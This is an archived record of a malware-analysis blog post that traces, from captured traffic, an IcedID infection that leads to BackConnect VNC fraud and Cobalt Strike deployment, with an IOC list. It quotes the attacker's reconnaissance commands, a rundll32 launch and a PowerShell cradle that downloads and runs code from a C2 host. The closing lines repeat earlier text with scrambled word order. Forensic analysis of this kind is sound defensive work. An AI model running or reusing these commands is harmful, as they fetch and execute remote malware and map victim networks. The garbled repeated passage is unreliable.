{ "id": "07d2a090-aeab-40b1-b561-5a24a2ad68fb", "created_at": "2026-04-06T00:10:56.179504Z", "updated_at": "2026-04-10T13:11:40.630553Z", "deleted_at": null, "sha1_hash": "5b7d0b352fefb6bb468045f8b3e19b801628002f", "title": "Forensic Timeline of an IcedID Infection", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 576122, "plain_text": "Forensic Timeline of an IcedID Infection\r\nBy Erik Hjelmvik\r\nPublished: 2023-10-12 · Archived: 2026-04-05 22:48:46 UTC\r\n, \r\nThursday, 12 October 2023 13:23:00 (UTC/GMT)\r\nThe BackConnect and VNC parsers that were added to NetworkMiner 2.8.1 provide a unique possibility to trace\r\nthe steps of an attacker with help of captured network traffic from a hacked computer.\r\nIn this blog post I use the free and open source version of NetworkMiner to see how GzipLoader downloads\r\nIcedID, after which the attacker deploys BackConnect VNC to purchase an iPhone 14 with a stolen credit card and\r\nthen drops Cobalt Strike on the victim PC.\r\nThe analyzed pcap is 2022-10-31-IcedID-with-DarkVNC-and-Cobalt-Strike-full-pcap-raw.pcap from Brad\r\nDuncan's malware-traffic-analysis.net blog.\r\nSafety First\r\nI ran NetworkMiner in a Windows Sandbox when analyzing this PCAP file to avoid accidentally infecting my\r\ncomputer with any of the malicious artifacts that NetworkMiner extracts from the network traffic.\r\nAnother safe way to analyze Windows malware is to run NetworkMiner in Linux or macOS.\r\n14:47 GzipLoader\r\nThis infection starts with GzipLoader (aka “IcedID Downloader”) reaching out to its C2 server on\r\nvgiragdoffy[.]com (67.205.184.237:80) to download IcedID.\r\nhttps://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection\r\nPage 1 of 17\n\nImage: Cookie parameters from GzipLoader request\r\nThe “_gat” cookie value in frame number 6 tells us that the victim machine is running a Windows 10 build 19045\r\n(aka 22H2). The long “_u” value contains the victim’s username and hostname in hexadecimal representation and\r\nthe “__io” value is the logged in user’s SID. NetworkMiner decodes these values from the GzipLoader request\r\nand displays them in the Hosts tab.\r\nhttps://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection\r\nPage 2 of 17\n\nImage: Hostname, SID, username and Windows version extracted from GzipLoader cookie\r\nFor more info about the GzipLoader cookie, see IcedID PhotoLoader evolution by Jason Reaves and the eSentire\r\nblog post on Gootloader and IcedID.\r\nThe response for this GzipLoader request is a 550 kB file (MD5 700c602086590b05dde8df57933c7e68) with a\r\nfake gzip header. This file actually contains the IcedID DLL (Odwikp.dll) and license.dat files.\r\nhttps://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection\r\nPage 3 of 17\n\nImage: Fake gzip file containing IcedID\r\n14:47 IcedID\r\nThe banking trojan IcedID (aka BokBot) gets launched at 14:47:29 UTC (frame 641) after which it connects to\r\nthese four IcedID servers used for payload delivery and C2:\r\nringashopsu[.]com = 137.184.208.116\r\nsainforgromset[.]com = 138.68.255.102\r\nyeloypod[.]hair = 94.140.114.103\r\nairsaintol[.]beauty = 66.63.168.75\r\nhttps://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection\r\nPage 4 of 17\n\nImage: JA3S hash of C2 server\r\nThese four IcedID servers all run TLS servers with self signed certificates issued for \"localhost\" and doing TLS\r\nhandshakes with JA3S hash ec74a5c51106f0419184d0dd08fb05bc. Both these properties can be used as filters in\r\nNetworkMiner's Hosts tab to only display the IcedID C2 servers.\r\nhttps://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection\r\nPage 5 of 17\n\nImage: Self-signed certificate from ringashopsu[.]com\r\n14:59 BackConnect and Keyhole VNC\r\nShortly after the IcedID C2 traffic has been started the IcedID bot also initiates BackConnect C2 connections to\r\n137.74.104.108 on TCP port 8080 (frame 4505 at 14:59:14 UTC).\r\nhttps://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection\r\nPage 6 of 17\n\nImage: IcedID BackConnect communication\r\nThe BackConnect C2 server tells the bot to sleep for 60 seconds two times before launching a reverse VNC\r\nsession with command 0x11 (frame 4530 at 15:01.09 UTC).\r\nhttps://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection\r\nPage 7 of 17\n\nImage: BackConnect VNC screenshots\r\nhttps://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection\r\nPage 8 of 17\n\nImage: Screenshot of attacker’s view of victim screen (Keyhole VNC)\r\n15:06 Apple Store\r\nhttps://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection\r\nPage 9 of 17\n\nImage: Attacker’s keystrokes extracted from BackConnect VNC traffic\r\nThe keylog of the attacker above reveals that the attacker is typing “iphone 14 apple store buy”. The VNC\r\ngraphics that NetworkMiner extracted from the PCAP file additionally reveal that this was a Google search query\r\ntyped into an Edge browser.\r\nhttps://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection\r\nPage 10 of 17\n\nImage: Google search results from reverse VNC session\r\n15:10 Credit Card payment\r\nThe attacker proceeds to the Apple Store, puts a black iPhone 14 Plus for $987.99 into the shopping cart, enters a\r\ndelivery address in West Hartford (US) and then inputs credit card details for the payment.\r\nhttps://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection\r\nPage 11 of 17\n\nImage: Credit card details entered in Apple Store by attacker\r\nLuckily, the transaction was denied by Apple Store.\r\nImage: Payment authorization failed\r\n15:12 Reverse Shell\r\nAfter having failed to buy an iPhone through the hacked computer the attacker instead deploys three reverse shell\r\nsessions using the BackConnect C2 channel.\r\nhttps://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection\r\nPage 12 of 17\n\nThese three commands are issued in the first reverse shell session:\r\nnet group \"domain admins\" /dom\r\narp -a\r\ndir \\\\172.16.0.12\\c$\r\nIn the second shell session the attacker first runs these three commands:\r\nshell net group \"domain admins\" /dom\r\nnet group \"domain admins\" /dom\r\nnltest /domain_trusts /all_trusts\r\n...and then starts a file manager session through the BackConnect C2 channel.\r\n15:40 Deploy Cobalt Strike\r\nThe BackConnect file manager is used to upload a Cobalt Strike binary called P2.dll to \"C:\\ProgramData\\\" on the\r\nvictim computer in frame 144535.\r\nhttps://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection\r\nPage 13 of 17\n\nImage: CobaltStrike delivered to victim through BackConnect's File Manager\r\nThe uploaded P2.dll is then executed by running this command in the reverse shell session (frame 144707):\r\nrundll32 c:\\programdata\\P2.dll,DllRegisterServer\r\nNetworkMiner extracts this uploaded DLL from the BackConnect network traffic.\r\nhttps://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection\r\nPage 14 of 17\n\nImage: Files extracted from network traffic\r\nImage: Details for Cobalt Strike P2.dll\r\nhttps://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection\r\nPage 15 of 17\n\nAs you can see in the screenshot above, the MD5 hash of P2.dll is\r\ncc69a31a067b62dda5f2076f8ee335e1. This file is flagged as malicious by most AV vendors (P2.dll on VT).\r\nHowever, none of them label it as Cobalt Strike. Luckily I was able to use Triage's malware config extractor to\r\nverify that this was indeed Cobalt Strike (P2.dll on tria.ge). Triage also revealed that the CobaltStrike C2 URL was\r\nclouditsoft[.]com:8008/static-directory/mg.jpg\r\nAfter the DLL gets executed the victim PC establishes Cobalt Strike beacon C2 connections to clouditsoft[.]com\r\non port 8008 (frame 144715).\r\nImage: Cobalt Strike beacon sessions\r\n15:41 MOAR COBALT STRIKE\r\nThe BackConnect Reverse Shell log in NetworkMiner's Parameters tab shows that the attacker also attempted to\r\ndownload Cobalt Strike using PowerShell at 15:41:59 UTC (frame 145176) with this command:\r\nhttps://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection\r\nPage 16 of 17\n\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -c \"IEX ((new-object\r\nnet.webclient).downloadstring('https://clouditsoft[.]com:8008/lass'))\"\r\nIOC List\r\nIP:port 67.205.184.237:80 (GzipLoader)\r\nDNS vgiragdoffy[.]com (GzipLoader)\r\nMD5 700c602086590b05dde8df57933c7e68 (Fake gzip file)\r\nMD5 f57ab2e5e5720572d5eb19010ec8dcb4 (IcedID Odwikp.dll from fake gzip)\r\nMD5 57a9d9acb389bd74a7423a16ef81ac18 (IcedID license.dat from fake gzip)\r\nDNS ringashopsu[.]com (IcedID C2)\r\nDNS sainforgromset[.]com (IcedID C2)\r\nDNS yeloypod[.]hair (IcedID C2)\r\nDNS airsaintol[.]beauty (IcedID C2)\r\nIP:port 137.184.208.116:443 (IcedID C2)\r\nIP:port 138.68.255.102:443(IcedID C2)\r\nIP:port 94.140.114.103:443 (IcedID C2)\r\nIP:port 66.63.168.7:443 (IcedID C2)\r\nJA3S hash ec74a5c51106f0419184d0dd08fb05bc (IcedID C2)\r\nIP:port 137.74.104.108:8080 (IcedID BackConnect C2)\r\nMD5 cc69a31a067b62dda5f2076f8ee335e1 (CobaltStrike P2.dll)\r\nDNS clouditsoft[.]com (CobaltStrike C2)\r\nIP:port 198.44.140.67:8008 (CobaltStrike C2)\r\nPosted by Erik Hjelmvik on Thursday, 12 October 2023 13:23:00 (UTC/GMT)\r\nTags: #NetworkMiner#IcedID#GzipLoader#BackConnect#VNC#Keyhole#CobaltStrike#Cobalt Strike#Windows\r\nSandbox#ec74a5c51106f0419184d0dd08fb05bc#JA3S\r\nSource: https://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection\r\nhttps://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection\r\nPage 17 of 17\n\n14:59 BackConnect Shortly after and Keyhole the IcedID C2 traffic VNC has been started the IcedID bot also initiates BackConnect C2 connections to\n137.74.104.108 on TCP port 8080 (frame 4505 at 14:59:14 UTC).\n Page 6 of 17\n\nImage: IcedID The BackConnect BackConnect C2 server communication tells the bot to sleep for 60 seconds two times before launching a reverse VNC\nsession with command 0x11 (frame 4530 at 15:01.09 UTC). \n Page 7 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.netresec.com/?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection" ], "report_names": [ "?page=Blog\u0026month=2023-10\u0026post=Forensic-Timeline-of-an-IcedID-Infection" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d", "created_at": "2022-10-25T16:07:24.139848Z", "updated_at": "2026-04-10T02:00:04.878798Z", "deleted_at": null, "main_name": "Safe", "aliases": [], "source_name": "ETDA:Safe", "tools": [ "DebugView", "LZ77", "OpenDoc", "SafeDisk", "TypeConfig", "UPXShell", "UsbDoc", "UsbExe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434256, "ts_updated_at": 1775826700, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/5b7d0b352fefb6bb468045f8b3e19b801628002f.pdf", "text": "https://archive.orkl.eu/5b7d0b352fefb6bb468045f8b3e19b801628002f.txt", "img": "https://archive.orkl.eu/5b7d0b352fefb6bb468045f8b3e19b801628002f.jpg" } }